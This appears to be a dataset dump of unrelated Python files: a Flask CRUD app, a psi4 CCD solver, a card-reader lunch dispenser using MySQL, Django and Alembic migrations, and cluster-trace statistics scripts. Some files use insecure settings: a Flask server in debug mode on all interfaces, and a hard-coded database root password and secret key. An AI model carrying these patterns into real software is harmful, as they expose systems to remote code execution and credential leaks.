db.Column(db.String(100))\n age = db.Column(db.Integer)\n emailID = db.Column(db.String(100))\n department = db.Column(db.String(100))\n\n def __init__(self, name, age, emailID, department):\n self.name = name\n self.age = age\n self.emailID = emailID\n self.department = department\n\n@app.route('/')\ndef Index():\n all_data = Data.query.all()\n return render_template('index.html', people = all_data)\n\n@app.route('/insert', methods=['POST'])\ndef Insert():\n if request.method == 'POST':\n name = request.form['name']\n age = request.form['age']\n email = request.form['emailID']\n department = request.form['department']\n \n actualData = Data(name, age, email, department)\n db.session.add(actualData)\n db.session.commit()\n\n flash('Data Entered Successfully')\n return redirect(url_for('Index'))\n\n@app.route('/update', methods=['GET', 'POST'])\ndef update():\n if request.method == 'POST':\n my_data = Data.query.get(request.form.get('id'))\n my_data.name = request.form['name']\n my_data.age = request.form['age']\n my_data.emailID = request.form['emailID']\n my_data.department = request.form['department']\n \n db.session.commit()\n \n flash('Data Updated Successfully!!!')\n return(redirect(url_for('Index')))\n\n@app.route('/delete//', methods=['GET', 'POST'])\ndef delete(id):\n my_data = Data.query.get(id)\n print(my_data)\n db.session.delete(my_data)\n db.session.commit()\n\n flash('Employee Data deleted Successfully')\n return redirect(url_for('Index'))\n\n\nif __name__ == \"__main__\":\n db.create_all()\n app.run(host=\"0.0.0.0\", debug=True)\n ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427559589","text":"q_tuple = (1,2,3,4,5,6,1,123,\"A\", \"b\", \"asdasd'\", 1 , 2.5 ,3, 4, -200, 300, \"1\")\r\n\r\nsumm = 0\r\ncount = 0\r\nmessage = ''\r\nfor i in q_tuple:\r\n if type(i) == int or type(i) == float:\r\n count += 1\r\n summ += i\r\n elif type(i) == str:\r\n message += i\r\nprint(summ / count)\r\nprint(message)","sub_path":"Lec_14_22.12/task10.py","file_name":"task10.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344044723","text":"import psi4.core\nimport numpy as np\n\n# get global options\nMAXITER = psi4.core.get_global_option('MAXITER')\nE_CONV = psi4.core.get_global_option('E_CONVERGENCE')\n\nclass CCD(object):\n\n def __init__(self, uhf):\n G = uhf.g # antisymmetrized AO-basis TEIs, \n C = uhf.C # MO coefficients\n self.e = uhf.e # orbital energies\n self.nocc = uhf.nocc # number of occupied spin-orbitals\n self.norb = uhf.norb # total number of spin-orbitals = 2 * number of basis functions\n self.nvir = uhf.norb - uhf.nocc # number of virtual spin-orbitals\n\n # transform integrals to MO basis\n mul = lambda T, M : np.tensordot(T, M, axes=(0,0))\n self.g = mul(mul(mul(mul(G, C), C), C), C)\n\n self.E = 0.0\n\n def compute_energy(self):\n nocc, nvir, e, g = self.nocc, self.nvir, self.e, self.g\n t = np.zeros((nocc, nocc, nvir, nvir))\n o = slice(None, nocc)\n v = slice(nocc, None)\n x = np.newaxis\n Ep = 1./(e[o,x,x,x] + e[x,o,x,x] - e[x,x,v,x] - e[x,x,x,v])\n\n for i in range(MAXITER):\n # isolate terms with P() factors as intermediates\n w1 = +1. * np.einsum(\"akic,jkbc->ijab\", g[v,o,o,v], t)\n w2 = -1./2 * np.einsum(\"klcd,ijac,klbd->ijab\", g[o,o,v,v], t, t)\n w3 = -1./2 * np.einsum(\"klcd,ikab,jlcd->ijab\", g[o,o,v,v], t, t)\n w4 = +1. * np.einsum(\"klcd,ikac,jlbd->ijab\", g[o,o,v,v], t, t)\n # update T2 amplitudes\n t = g[o,o,v,v] \\\n + 1./2 * np.einsum(\"abcd,ijcd->ijab\", g[v,v,v,v], t) \\\n + 1./2 * np.einsum(\"klij,klab->ijab\", g[o,o,o,o], t) \\\n + w1.transpose((0,1,2,3)) - w1.transpose((0,1,3,2)) \\\n - w1.transpose((1,0,2,3)) + w1.transpose((1,0,3,2)) \\\n + w2.transpose((0,1,2,3)) - w2.transpose((0,1,3,2)) \\\n + w3.transpose((0,1,2,3)) - w3.transpose((1,0,2,3)) \\\n + 1./4 * np.einsum(\"klcd,ijcd,klab->ijab\", g[o,o,v,v], t, t) \\\n + w4.transpose((0,1,2,3)) - w4.transpose((1,0,2,3))\n t *= Ep\n # evaluate energy\n E = 1./4 * np.sum(g[o,o,v,v] * t)\n dE = E - self.E\n self.E, self.t = E, t\n print ('@CCD {:<3d} {:20.15f} {:20.15f}' .format(i, E, dE)) # print progress to terminal\n psi4.core.print_out('@CCD {:<3d} {:20.15f} {:20.15f}\\n'.format(i, E, dE)) # print progress to output\n if(np.fabs(dE) < E_CONV): break # quit if converged\n\n return self.E\n","sub_path":"8/avcopan/ccd.py","file_name":"ccd.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"486315580","text":"#___________________________________IMPORTS____________________________________\nfrom flask import Flask, render_template\nfrom flask_socketio import SocketIO\nfrom time import localtime, time, sleep\nfrom playsound import playsound\nimport mysql.connector\nimport threading\nimport serial\nimport json\n\n#____________________________________INIT______________________________________\napp = Flask(__name__)\napp.config[\"secret_key\"] = \"secret!\"\nsocketio = SocketIO(app)\n\nmydb = mysql.connector.connect(host=\"localhost\",\n user=\"root\",\n passwd=\"heslo\",\n db=\"obedy_test\")\ncursor = mydb.cursor()\n\nser = serial.Serial()\nser.baudrate = 9600\nser.port = 'COM4'\n\nschedule_check = 0\n\n#____________________________________FUNCIONS__________________________________\ndef get_lunch_amount():\n cursor.execute(\"SELECT COUNT(*) FROM OBEDY WHERE cislo_obedu=1 AND stav=1\")\n ones = cursor.fetchall()\n cursor.execute(\"SELECT COUNT(*) FROM OBEDY WHERE cislo_obedu=2 AND stav=1\")\n twos = cursor.fetchall()\n amount = {\"ones\":ones[0][0], \"twos\":twos[0][0]}\n return amount\n\ndef in_time(range, my_time):\n before = (range[0][0] > my_time[0]) or ((range[0][0] == my_time[0]) and (range[0][1] > my_time[1]))\n after = (range[1][0] < my_time[0]) or ((range[1][0] == my_time[0]) and (range[1][1] < my_time[1]))\n return not (before or after)\n\ndef what_day(num):\n days = (\"po\", \"ut\", \"st\", \"ct\", \"pa\", \"so\", \"ne\")\n if num > 4:\n return \"po\"\n return days[num]\n\ndef break_time(my_time, schedule_table):\n for lunchbreak in schedule_table[\"breaks\"]:\n if in_time(schedule_table[\"breaks\"][lunchbreak], my_time):\n return lunchbreak\n return False\n\ndef dispence_lunch(consumer, card_id, lunch_amount):\n print(\"Lunch dispenced\")\n cursor.execute(\"UPDATE OBEDY SET STAV=2 WHERE karta=%s\", (card_id,))\n if consumer[2] == 1:\n lunch_amount[\"ones\"] -= 1\n playsound(\"audio/one.wav\")\n elif consumer[2] == 2:\n lunch_amount[\"twos\"] -= 1\n playsound(\"audio/two.wav\")\n else:pass\n socketio.emit(\"update_amounts\", lunch_amount)\n\ndef check(consumer, card_id, lunch_amount):\n current_time = localtime(time())\n day = what_day(current_time.tm_wday)\n current_time = (current_time.tm_hour,current_time.tm_min)\n current_time = (12,25)\n print(current_time, day)\n\n with open(\"schedule.json\", \"r\") as json_data:\n schedule_table = json.load(json_data)\n\n miss_schedule = False\n if consumer[3] != 1:\n print(\"NO LUNCH\")\n playsound(\"audio/no.wav\")\n else:\n if schedule_check:\n print(\"checking schedule\")\n lunchbreak = break_time(current_time, schedule_table)\n if lunchbreak:\n if consumer[1] in schedule_table[day][lunchbreak]:\n print(\"On time\")\n dispence_lunch(consumer, card_id, lunch_amount)\n else:\n print(\"GET OUT\")\n playsound(\"audio/miss.wav\")\n miss_schedule = True\n else:\n print(\"Here you go\")\n dispence_lunch(consumer, card_id, lunch_amount)\n else:\n print(\"Here you go\")\n dispence_lunch(consumer, card_id, lunch_amount)\n\n print(\"sending consumer data\")\n socketio.emit(\"card_swipe\", {\"consumer\":consumer, \"card_id\":card_id, \"miss_schedule\":miss_schedule})\n\ndef card_swipe(card_id):\n cursor.execute(\"SELECT * FROM OBEDY WHERE karta=%s\", (card_id,))\n result = cursor.fetchall()\n print(result)\n if result:\n return (result[0][4], result[0][5], result[0][6], result[0][7])\n else: return False\n\n#___________________________________LOOP_______________________________________\ndef reader_loop(lunch_amount):\n ser.open()\n while 1:\n card_id = ser.readline().strip()\n card_id = str(card_id, 'utf-8')\n print(card_id)\n if card_id:\n consumer = card_swipe(card_id)\n print(consumer)\n if consumer:\n check(consumer, card_id, lunch_amount)\n else:\n print(\"invalid id\")\n\nlunch_amount = get_lunch_amount()\nthreading._start_new_thread(reader_loop, (lunch_amount, ))\n\n#___________________________________COMUNICATION_______________________________\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n return render_template(\"table.html\")\n\n@app.route(\"/rozvrhy\")\ndef interface():\n with open(\"schedule.json\", \"r\") as json_data:\n schedule_table = json.load(json_data)\n\n return render_template(\"rozvrhy.html\", schedule_table=schedule_table)\n\n@socketio.on(\"connected\")\ndef connector(data):\n print(data[\"data\"])\n socketio.emit('update_amounts', lunch_amount)\n\n@socketio.on(\"approved\")\ndef disspenced(data):\n print(\"deviant approoved\")\n dispence_lunch(data[\"consumer\"], data[\"card_id\"], lunch_amount)\n\n@socketio.on(\"switch_schedule\")\ndef switch_schedule(setting):\n global schedule_check\n schedule_check = setting\n print(\"schedule check: \", schedule_check)\n\n@socketio.on(\"schedule_change\")\ndef update_schedule(data):\n print(\"schedule updated\")\n with open(\"schedule.json\", \"w\") as json_data:\n json.dump(data[\"data\"], json_data)\n\n#___________________________________SERVER_START_______________________________\nif __name__ == \"__main__\":\n socketio.run(app)\n","sub_path":"app/obedy.py","file_name":"obedy.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72530005","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\nimport magazine.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Brand',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=30)),\n ('additional_information', models.TextField(null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ('url', models.URLField(null=True, blank=True)),\n ('parent', models.OneToOneField(null=True, blank=True, to='magazine.Category')),\n ],\n ),\n migrations.CreateModel(\n name='Color',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ('color', models.CharField(max_length=7)),\n ],\n ),\n migrations.CreateModel(\n name='Comments',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('comment', models.TextField()),\n ('date_and_time', models.DateTimeField(auto_now=True)),\n ],\n ),\n migrations.CreateModel(\n name='Designer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=30)),\n ('personal_information', models.TextField(null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Existence',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('amount', models.IntegerField()),\n ('color', models.ForeignKey(to='magazine.Color')),\n ],\n ),\n migrations.CreateModel(\n name='Good',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=17)),\n ('price', models.FloatField(validators=[django.core.validators.MinValueValidator(0)])),\n ('description_full', models.TextField()),\n ('additional_information', models.TextField(null=True, blank=True)),\n ('helpfull_links', models.TextField(null=True, blank=True)),\n ('make_a_gift', models.TextField(null=True, blank=True)),\n ('adding_date', models.DateField()),\n ('visitors_amount', models.IntegerField(default=0, blank=True)),\n ('description_meta', models.TextField(null=True, blank=True)),\n ('keywords_meta', models.TextField(null=True, blank=True)),\n ('image_main', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_1_large', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_2_large', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_3_large', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_4_large', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_1_small', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_2_small', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_3_small', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_4_small', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('brand', models.ForeignKey(to='magazine.Brand')),\n ('category', models.ForeignKey(to='magazine.Category')),\n ('color', models.ManyToManyField(to='magazine.Color', through='magazine.Existence')),\n ('designer', models.ForeignKey(blank=True, to='magazine.Designer', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Rating',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('mark', models.IntegerField(validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(5)])),\n ('good', models.ForeignKey(to='magazine.Good')),\n ],\n ),\n migrations.CreateModel(\n name='Sale',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nominal', models.FloatField(validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(1)])),\n ('begin', models.DateTimeField(null=True, blank=True)),\n ('end', models.DateTimeField(null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Sales',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('dateTime', models.DateTimeField()),\n ('user', models.CharField(max_length=30)),\n ('good_color_size', models.ForeignKey(to='magazine.Existence', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Size',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=3)),\n ],\n ),\n migrations.AddField(\n model_name='good',\n name='sale',\n field=models.ForeignKey(blank=True, to='magazine.Sale', null=True),\n ),\n migrations.AddField(\n model_name='existence',\n name='good',\n field=models.ForeignKey(to='magazine.Good'),\n ),\n migrations.AddField(\n model_name='existence',\n name='size',\n field=models.ForeignKey(to='magazine.Size'),\n ),\n migrations.AddField(\n model_name='comments',\n name='good',\n field=models.ForeignKey(to='magazine.Good'),\n ),\n migrations.AddField(\n model_name='comments',\n name='parent',\n field=models.ForeignKey(blank=True, to='magazine.Comments', null=True),\n ),\n ]\n","sub_path":"magazine/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117967746","text":"# -*- coding: utf-8 -*-\n# !usr/bin/python3\n\"\"\"\n Ali Trace Machine Statistics\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n copyright:(c) 2017 by Jingwen Shi\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nclass TraceStatistics(object):\n\n def __init__(self):\n # Add data path\n path_server_event = os.path.join(\"./data/server_event.csv\")\n path_container_event = os.path.join(\"./data/container_event.csv\")\n path_batch_instance = os.path.join(\"./data/batch_instance.csv\")\n\n path_batch_task = os.path.join(\"./data/batch_task.csv\")\n path_container_usage = os.path.join(\"./data/container_usage.csv\")\n path_server_usage = os.path.join(\"./data/server_usage.csv\")\n \"\"\"\n # Load distribution map\n col_batch = ['time_istart', 'time_iend', 'jid', 'tid', 'mid', 'status''num_sqe',\n 'num_sqe_total', 'num_cpu_maxus', 'num_cpu_aveus', 'norm_mem_maxu', 'norm_mem_aveus']\n col_container = ['timestampc', 'etypec', 'insid', 'mid',\n 'num_cpu_req', 'norm_mem_req', 'norm_disk_req', 'id_cpu_allo']\n col_server = ['timestamps', 'mid', 'etypes',\n 'edetail','num_cpu', 'norm_mem', 'norm_disk']\n self.batch_instance = pd.DataFrame(pd.read_csv(path_batch_instance,\n names=col_batch, index_col=False))# 16094655 rows\n self.container_event = pd.DataFrame(pd.read_csv(path_container_event,\n names=col_container, index_col=False))# 11102 rows\n self.server_event = pd.DataFrame(pd.read_csv(path_server_event,\n names=col_server, index_col=False))# 1352 rows\n \"\"\"\n # Load usage data\n col_btask = ['time_tcreate', 'time_tend', 'jid', 'tid',\n 'num_ins', 'status', 'num_cpu_req', 'norm_mem_req']\n col_cusage = ['time_start','insid_online', 'per_cpu_req',\n 'per_mem_req', 'per_disk_req', 'ave1_cpu', 'ave5_cpu',\n 'ave15_cpu', 'ave_cpi', 'ave1000_mem_miss', 'max_cpi', 'max_mem_miss']\n col_susage = ['timestampsu', 'mid', 'per_cpu', 'per_mem',\n 'per_disk', 'ave1_cpu', 'ave5_cpu', 'ave15_cpu']\n #self.batch_task = pd.DataFrame(pd.read_csv(path_batch_task,\n # names=col_btask, index_col=False))\n self.container_usage = pd.DataFrame(pd.read_csv(path_container_usage,\n names=col_cusage, index_col=False))\n self.server_usage = pd.DataFrame(pd.read_csv(path_server_usage,\n names=col_susage, index_col=False))\n\n def usage_hour(self):\n # usgae min/max/median of server\n copy_serv = self.server_usage\n grouped_scpu_usage = copy_serv['per_cpu'].groupby([copy_serv['timestampsu']])\n count_scpu_usage = grouped_scpu_usage.agg(['min', 'max', 'median'])\n count_scpu_usage.to_csv('./scpu_usage')\n grouped_smem_usage = copy_serv['per_mem'].groupby([copy_serv['timestampsu']])\n count_smem_usage = grouped_smem_usage.agg(['min', 'max', 'median'])\n count_smem_usage.to_csv('./smem_usage')\n grouped_sdisk_usage = copy_serv['per_disk'].groupby([copy_serv['timestampsu']])\n count_sdisk_usage = grouped_sdisk_usage.agg(['min', 'max', 'median'])\n count_sdisk_usage.to_csv('./sdisk_usage')\n\n # Usage min/max/median of container\n copy_con = self.container_usage\n grouped_ccpu_usage = copy_con['per_cpu_req'].groupby([copy_con['time_start']])\n count_ccpu_usage = grouped_ccpu_usage.agg(['min', 'max', 'median'])\n count_ccpu_usage.to_csv('./ccpu_usage')\n grouped_cmem_usage = copy_con['per_mem_req'].groupby([copy_con['time_start']])\n count_cmem_usage = grouped_cmem_usage.agg(['min', 'max', 'median'])\n count_cmem_usage.to_csv('./cmem_usage')\n copy_con = self.container_usage\n grouped_cdisk_usage = copy_con['per_disk_req'].groupby([copy_con['time_start']])\n count_cdisk_usage = grouped_cdisk_usage.agg(['min', 'max', 'median'])\n count_cdisk_usage.to_csv('./cdisk_usage')\n\n def draw_usage(self):\n # Load datas of server usage\n col_serv = ['timestampsu', 'min', 'max', 'median']\n scpu_usage = pd.DataFrame(pd.read_csv('./scpu_usage', names=col_serv, index_col=False))\n smem_usage = pd.DataFrame(pd.read_csv('./smem_usage', names=col_serv, index_col=False))\n sdisk_usage = pd.DataFrame(pd.read_csv('./sdisk_usage', names=col_serv, index_col=False))\n print(type(scpu_usage['timestampsu'].get_values()))\n # Draw plots of server usage\n fig1 = plt.figure(1)\n plt.subplot(131)\n plt.plot(scpu_usage['timestampsu'].get_values(), scpu_usage['min'].get_values())\n \"\"\"\n ax11 = fig1.add_subplot(1, 3, 1)\n ax11.plot(scpu_usage['timestampsu'], scpu_usage['min'])\n ax12 = fig1.add_subplot(1, 3, 2)\n ax12.plot(smem_usage['timestampsu'], scpu_usage['max'])\n ax13 = fig1.add_subplot(1, 3, 3)\n ax13.plot(sdisk_usage['timestampsu'], scpu_usage['median'])\n\n # Load datas of container usage\n col_con = ['time_start', 'min', 'max', 'median']\n ccpu_usage = pd.DataFrame(pd.read_csv('./ccpu_usage', names=col_con, index_col=False))\n cmem_usage = pd.DataFrame(pd.read_csv('./cmem_usage', names=col_con, index_col=False))\n cdisk_usage = pd.DataFrame(pd.read_csv('./cdisk_usage', names=col_con, index_col=False))\n\n # Draw plots of container usage\n fig2 = plt.figure(2)\n ax21 = fig2.add_subplot(1, 3, 1)\n ax21.plot(ccpu_usage['time_start'], ccpu_usage['min'])\n ax22 = fig2.add_subplot(1, 3, 2)\n ax22.plot(cmem_usage['time_start'], ccpu_usage['max'])\n ax23 = fig2.add_subplot(1, 3, 3)\n ax23.plot(cdisk_usage['time_start'], ccpu_usage['median'])\n \"\"\"\n plt.show()\n\n def conf_type(self):\n \"\"\"\n Count machine configurations using groupby()\n Cpu = 0 memory = 0 disk = 0 are not counted\n \"\"\"\n copy = self.server_event\n copy['one'] = 1\n conf = copy[self.server_event.num_cpu > 0]\n grouped_conf = conf['one'].groupby([conf['num_cpu'], conf['norm_mem'],\n conf['norm_disk']])\n conf_type = grouped_conf.count()\n conf_type.to_csv('./conf_type.csv', sep='|')\n # List mid of different configuration and check if there're duplicated machines\n grouped_conf0 = conf['one'].groupby([conf['num_cpu'], conf['norm_mem'],\n conf['norm_disk'], conf['mid']])\n conf_type0 = grouped_conf0.count()\n conf_type0.to_csv('./conf_type0.csv', sep='|')\n # Output results\n print(\"Total Number of machine:\")\n print(len(set(self.server_event['mid'])))\n print(\"Configuration types:\")\n print(conf_type)\n\n def job_duration(self):\n # Run time of task\n time_tcreate = pd.DataFrame(self.batch_task['time_tcreate'],\n self.batch_task['jid']).groupby('jid')\n min_tcreate = time_tcreate.min()\n time_tend = pd.DataFrame(self.batch_task['time_tend'],\n self.batch_task['jid']).groupby('jid')\n max_tend = time_tend.max()\n create_stop = pd.merge(min_tcreate, max_tend, on='jid')\n duration = [create_stop['jid'], create_stop['time_tend']-create_stop['time_tcreate']]\n print(duration)\n\n def task_requested_resource(self):\n # Raw Required resources (CPU and Memory) of task\n max_cpu = self.batch_task['num_cpu_req'].max()\n norm_cm_req = np.array(self.batch_task['jid'], self.batch_task['num_cpu_req']/max_cpu,\n self.batch_task['norm_mem_req'])\n print(norm_cm_req)\n\nmstatistic = TraceStatistics()\nmstatistic.conf_type()\n#mstatistic.usage_hour()\n#mstatistic.draw_usage()\n","sub_path":"Trace.py","file_name":"Trace.py","file_ext":"py","file_size_in_byte":8107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130401408","text":"\"\"\"empty message\n\nRevision ID: 9f135f2eb76f\nRevises: 080f7a4f55d3\nCreate Date: 2019-09-17 21:31:17.724610\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9f135f2eb76f'\ndown_revision = '080f7a4f55d3'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('colonies', sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=True))\n op.add_column('colonies_processed_materials', sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=True))\n op.add_column('colonies_raw_resources', sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=True))\n op.add_column('colonies_refined_commodities', sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('colonies_refined_commodities', 'deleted')\n op.drop_column('colonies_raw_resources', 'deleted')\n op.drop_column('colonies_processed_materials', 'deleted')\n op.drop_column('colonies', 'deleted')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2019-09-17, 21:31.py","file_name":"2019-09-17, 21:31.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379258965","text":"strin = input()\nk = int(strin[0])\nn = int(strin[3:len(strin)])\ntotal = []\na = [0]*10\nresult = []\ndef func(n,r,m):\n if n